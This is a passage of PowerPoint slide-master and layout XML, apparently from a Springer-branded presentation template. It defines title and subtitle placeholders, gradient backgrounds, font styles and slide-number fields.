            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37374666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0_title slide default">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rechteck 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F12B47F-986C-471D-9CB8-84A8943D79CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9180513" cy="6911975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent1"/>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="tx1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="18900000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
                <a:cs typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="37931725" indent="-37474525">
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="457200" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1371600" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828800" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Geneva" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Bild 10" descr="n_PPT CoverPict_Springer_6.8..png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D9F5B56-C53E-4C33-813E-8C2F9020611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4875" y="993775"/>
            <a:ext cx="4027488"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 11" descr="verlauf.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2455EED-6018-4233-A466-2D1A78E3FD9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889250"/>
            <a:ext cx="5410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 8" descr="Springer_pms.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5621095-C29A-414D-9440-CFC988081C7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43363" y="3130550"/>
            <a:ext cx="1997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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779667" y="5537200"/>
            <a:ext cx="4896021" cy="765373"/>
          </a:xfrm>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Times" charset="0"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772652" y="4165600"/>
            <a:ext cx="4903036" cy="1209040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3400" b="0" i="0" spc="30">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Cambria"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3687184294"/>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9E6468AE-26C6-460B-8AE0-11F224E36FD9}"/>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93E591DA-BC7F-491E-A9E9-B8DD1951F380}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3079D6EF-9E1A-4DBB-B0D6-142C1929C19C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1ED81CD-183C-4DCD-9F86-10D0D7D0CC3B}"/>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364257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AC9550D6-A1AF-4177-9DA8-0A703BCEFAD4}"/>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3D705EB3-616A-4DE3-A36C-4DCA7CDC94C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2C059D6C-EC94-4721-9294-54393EC93A81}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A3BA14E-C746-41A0-810C-511D6213EA55}"/>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80617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F375BB9A-1474-42E4-B34C-72838ACFF116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter"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id="{83CF5F18-6709-4B0B-9AFF-D349425514E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DF1BF11C-5F85-4559-99E5-272AA0A99772}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D2B540-0E95-4FB4-8679-BAD4066F601D}"/>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843377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981200"/>
            <a:ext cx="4038600" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBCA66EC-21A8-4F2C-A039-4C22DB0446D5}"/>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8CBAB090-F9FD-4421-86A2-86B51B2C25E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3412FA0D-BBB7-4AB9-ADA1-93C84966B09B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F65EBA0-893C-4587-B830-8052E077593B}"/>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860091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able Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3D134D-6255-4453-A333-E5984C61C556}"/>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01698960-4AD1-43C6-8114-F956E1217527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A0136FF1-33A1-4C07-A9EB-920BD3EEC8B2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089D1752-2AFF-46B9-988C-C8C79D2D3ECE}"/>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520172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3384BA84-78A1-4BB1-84D7-DD604DE142AB}"/>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2E0F3D79-7350-4912-8343-743E920D653D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DBFB4B3D-4053-45F7-AA09-37F5619E3115}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DAB53CD-BFBF-4606-8C83-8A6F3DD42E17}"/>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543844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76F4AF76-328E-4F5D-A22E-DB28E9D05379}"/>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5FA5B9EF-D84F-431F-BCE3-97CC4115A6EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4ECFA4D1-3B4C-4143-A8CC-24688FC2769C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9DC7104-EF63-4D4B-8020-F083326ADE6B}"/>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517184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40005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D5AFF230-8D34-4924-ACEA-869E01A5950E}"/>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64BC9ED6-0B7E-4439-B200-2548918701F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{096C2953-2266-44E5-893D-1DF86D13FE1B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424AA96B-DF52-4AE4-98C8-15692C8D0620}"/>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9713118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9CD1BA4-8980-4D24-8FF0-83C5E6F62D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter"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id="{075300F6-5DC7-492B-8A90-0FB65FC39859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{47090AB0-C216-419A-ABBC-B009BB58F22F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E0C3DD-F0E3-4C86-B92F-6C2D0718AB26}"/>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421450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9A2CCE7B-FA21-48B4-BB1E-291B1DF1BD9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter"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id="{DC291B2C-70DE-4258-81BE-33ECB589D4E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DE610DD8-8D35-4A45-8B65-8897B5414532}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF96D65-505F-49FD-B397-12CBC58D5D1A}"/>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71628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fault text">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522000" y="1519237"/>
            <a:ext cx="8136000" cy="48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0" marR="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sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1800"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Titel 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375464417"/>
      </p:ext>
    </p:extLst>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7202C690-C20E-4D46-92B3-B6F247D329C1}"/>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E76390D9-B65E-4A70-8F2B-B46AE3B8ECF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AA388E42-1E41-465E-BDE3-0C665E692390}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17BCCCCD-BED6-45CA-97F5-546E8813B3DD}"/>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552243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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="19812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40005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05B9FA28-6DAC-4300-B1E6-1306DC15D1F2}"/>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9800A4E1-BC9B-48CD-BAE7-FC823C3A9584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
